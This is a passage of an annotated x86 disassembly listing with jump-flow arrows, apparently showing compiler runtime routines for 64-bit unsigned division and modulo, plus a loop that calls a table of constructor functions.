mov -0x4(%ebp),%eax | | 0807480b: divl -0x1c(%ebp) | | 0807480e: mov %eax,%edi | | 08074810: jmp 0x080748a6 |*| 08074815: lea 0x0(%esi),%esi ||| 08074818: cmp %ebx,%edi *|| 0807481a: jbe 0x08074824 * || 0807481c: xor %edi,%edi |* || 0807481e: jmp 0x080748a4 ||*|| 08074823: nop ||||| 08074824: bsr %edi,%edx *|||| 08074827: xor $0x1f,%dl |||| 0807482a: mov %edx,-0x24(%ebp) |||| 0807482d: test %edx,%edx |||| 0807482f: jne 0x08074844 *|||| 08074831: cmp %edi,%ebx ||||| 08074833: ja 0x0807483d *||||| 08074835: mov -0x1c(%ebp),%edx |||||| 08074838: cmp %edx,-0x4(%ebp) |||||| 0807483b: jb 0x0807481c ||*||| 0807483d: mov $0x1,%edi *| ||| 08074842: jmp 0x080748a4 |*||| 08074844: mov $0x20,%esi *|||| 08074849: sub -0x24(%ebp),%esi |||| 0807484c: mov -0x24(%ebp),%ecx |||| 0807484f: shl %cl,%edi |||| 08074851: mov %edi,-0x8(%ebp) |||| 08074854: mov -0x1c(%ebp),%eax |||| 08074857: mov %esi,%ecx |||| 08074859: shr %cl,%eax |||| 0807485b: or %eax,%edi |||| 0807485d: mov -0x24(%ebp),%ecx |||| 08074860: shll %cl,-0x1c(%ebp) |||| 08074863: mov %ebx,%eax |||| 08074865: mov %esi,%ecx |||| 08074867: shr %cl,%eax |||| 08074869: mov %eax,-0xc(%ebp) |||| 0807486c: mov -0x24(%ebp),%ecx |||| 0807486f: shl %cl,%ebx |||| 08074871: mov %ebx,-0x10(%ebp) |||| 08074874: mov -0x4(%ebp),%eax |||| 08074877: mov %esi,%ecx |||| 08074879: shr %cl,%eax |||| 0807487b: or %eax,%ebx |||| 0807487d: mov -0x24(%ebp),%ecx |||| 08074880: shll %cl,-0x4(%ebp) |||| 08074883: mov %ebx,%eax |||| 08074885: mov -0xc(%ebp),%edx |||| 08074888: div %edi |||| 0807488a: mov %edx,%ebx |||| 0807488c: mov %eax,%edi |||| 0807488e: mov -0x1c(%ebp),%eax |||| 08074891: mul %edi |||| 08074893: mov %edx,-0x24(%ebp) |||| 08074896: mov %eax,%esi |||| 08074898: cmp %ebx,%edx |||| 0807489a: ja 0x080748a3 *|||| 0807489c: jne 0x080748a4 *||||| 0807489e: cmp %esi,-0x4(%ebp) |||||| 080748a1: jae 0x080748a4 *|||||| 080748a3: dec %edi ||*|||| 080748a4: xor %esi,%esi ** **|* 080748a6: mov %edi,-0x18(%ebp) * 080748a9: mov %esi,-0x14(%ebp) 080748ac: mov -0x18(%ebp),%eax 080748af: mov -0x14(%ebp),%edx 080748b2: lea -0x30(%ebp),%esp 080748b5: pop %ebx 080748b6: pop %esi 080748b7: pop %edi 080748b8: mov %ebp,%esp 080748ba: pop %ebp 080748bb: ret 080748bc: push %ebp 080748bd: mov %esp,%ebp 080748bf: sub $0x28,%esp 080748c2: push %edi 080748c3: push %esi 080748c4: push %ebx 080748c5: mov 0x10(%ebp),%edi 080748c8: mov 0x14(%ebp),%ebx 080748cb: mov 0x8(%ebp),%esi 080748ce: mov 0xc(%ebp),%eax 080748d1: mov %eax,-0x20(%ebp) 080748d4: test %ebx,%ebx 080748d6: jne 0x08074918 * 080748d8: cmp %eax,%edi | 080748da: jbe 0x080748e8 *| 080748dc: mov %esi,%eax || 080748de: mov -0x20(%ebp),%edx || 080748e1: div %edi || 080748e3: jmp 0x08074907 ||* 080748e5: lea 0x0(%esi),%esi ||| 080748e8: test %edi,%edi *|| 080748ea: jne 0x080748f9 *|| 080748ec: mov $0x1,%edx ||| 080748f1: mov %edx,%eax ||| 080748f3: xor %edx,%edx ||| 080748f5: div %edi ||| 080748f7: mov %eax,%edi ||| 080748f9: mov -0x20(%ebp),%eax *|| 080748fc: xor %edx,%edx || 080748fe: div %edi || 08074900: mov %edx,-0x20(%ebp) || 08074903: mov %esi,%eax || 08074905: div %edi || 08074907: mov %edx,%esi |* 08074909: mov %esi,-0x10(%ebp) | 0807490c: movl $0x0,-0xc(%ebp) | 08074913: jmp 0x080749fc |* 08074918: cmp %ebx,-0x20(%ebp) *| 0807491b: jb 0x0807493d *| 0807491d: bsr %ebx,%edx || 08074920: xor $0x1f,%dl || 08074923: mov %edx,-0x14(%ebp) || 08074926: test %edx,%edx || 08074928: jne 0x08074958 *|| 0807492a: cmp %ebx,-0x20(%ebp) ||| 0807492d: ja 0x08074933 * ||| 0807492f: cmp %edi,%esi | ||| 08074931: jb 0x0807493d |*||| 08074933: mov -0x20(%ebp),%edx *|||| 08074936: sub %edi,%esi |||| 08074938: sbb %ebx,%edx |||| 0807493a: mov %edx,-0x20(%ebp) |||| 0807493d: mov %esi,-0x10(%ebp) *|*| 08074940: mov -0x20(%ebp),%ecx | | 08074943: mov %ecx,-0xc(%ebp) | | 08074946: mov -0x10(%ebp),%eax | | 08074949: mov %eax,-0x8(%ebp) | | 0807494c: mov -0xc(%ebp),%eax | | 0807494f: mov %eax,-0x4(%ebp) | | 08074952: jmp 0x08074a08 |*| 08074957: nop ||| 08074958: mov $0x20,%edx *|| 0807495d: sub -0x14(%ebp),%edx || 08074960: mov %edx,-0x18(%ebp) || 08074963: mov -0x14(%ebp),%ecx || 08074966: shl %cl,%ebx || 08074968: mov %ebx,-0x28(%ebp) || 0807496b: mov %edi,%eax || 0807496d: mov %edx,%ecx || 0807496f: shr %cl,%eax || 08074971: or %eax,%ebx || 08074973: mov -0x14(%ebp),%ecx || 08074976: shl %cl,%edi || 08074978: mov -0x20(%ebp),%eax || 0807497b: mov %edx,%ecx || 0807497d: shr %cl,%eax || 0807497f: mov %eax,-0x1c(%ebp) || 08074982: mov -0x20(%ebp),%eax || 08074985: mov -0x14(%ebp),%ecx || 08074988: shl %cl,%eax || 0807498a: mov %eax,-0x28(%ebp) || 0807498d: mov %esi,%eax || 0807498f: mov %edx,%ecx || 08074991: shr %cl,%eax || 08074993: mov -0x28(%ebp),%edx || 08074996: or %eax,%edx || 08074998: mov %edx,-0x20(%ebp) || 0807499b: mov -0x14(%ebp),%ecx || 0807499e: shl %cl,%esi || 080749a0: mov -0x20(%ebp),%eax || 080749a3: mov -0x1c(%ebp),%edx || 080749a6: div %ebx || 080749a8: mov %edx,-0x20(%ebp) || 080749ab: mov %eax,-0x28(%ebp) || 080749ae: mul %edi || 080749b0: mov %edx,-0x24(%ebp) || 080749b3: mov %eax,-0x28(%ebp) || 080749b6: mov -0x20(%ebp),%ecx || 080749b9: cmp %ecx,%edx || 080749bb: ja 0x080749c3 * || 080749bd: jne 0x080749d3 | *|| 080749bf: cmp %esi,%eax | ||| 080749c1: jbe 0x080749d3 |*||| 080749c3: mov -0x24(%ebp),%eax *|||| 080749c6: mov -0x28(%ebp),%edx |||| 080749c9: sub %edi,%edx |||| 080749cb: sbb %ebx,%eax |||| 080749cd: mov %edx,-0x28(%ebp) |||| 080749d0: mov %eax,-0x24(%ebp) |||| 080749d3: mov -0x20(%ebp),%ecx **|| 080749d6: sub -0x28(%ebp),%esi || 080749d9: sbb -0x24(%ebp),%ecx || 080749dc: mov %ecx,-0x20(%ebp) || 080749df: mov -0x20(%ebp),%eax || 080749e2: mov -0x18(%ebp),%ecx || 080749e5: shl %cl,%eax || 080749e7: mov -0x14(%ebp),%ecx || 080749ea: shr %cl,%esi || 080749ec: mov %esi,-0x24(%ebp) || 080749ef: or %esi,%eax || 080749f1: mov %eax,-0x10(%ebp) || 080749f4: mov -0x20(%ebp),%eax || 080749f7: shr %cl,%eax || 080749f9: mov %eax,-0xc(%ebp) || 080749fc: mov -0x10(%ebp),%edx |* 080749ff: mov %edx,-0x8(%ebp) | 08074a02: mov -0xc(%ebp),%edx | 08074a05: mov %edx,-0x4(%ebp) | 08074a08: mov -0x8(%ebp),%eax * 08074a0b: mov -0x4(%ebp),%edx 08074a0e: lea -0x34(%ebp),%esp 08074a11: pop %ebx 08074a12: pop %esi 08074a13: pop %edi 08074a14: mov %ebp,%esp 08074a16: pop %ebp 08074a17: ret 08074a18: push %ebx 08074a19: mov $0x807ba78,%ebx 08074a1e: cmpl $-0x1,0x807ba78 08074a25: je 0x08074a34 * 08074a27: nop | 08074a28: mov (%ebx),%eax *| 08074a2a: call *%eax || 08074a2c: add $-0x4,%ebx || 08074a2f: cmpl $-0x1,(%ebx) || 08074a32: jne 0x08074a28 *| 08074a34: pop %ebx * 08074a35: ret 08074a36: lea (%esi),%esi 08074a38: ret 08074a39: nop 08074a3a: nop 08074a3b: nop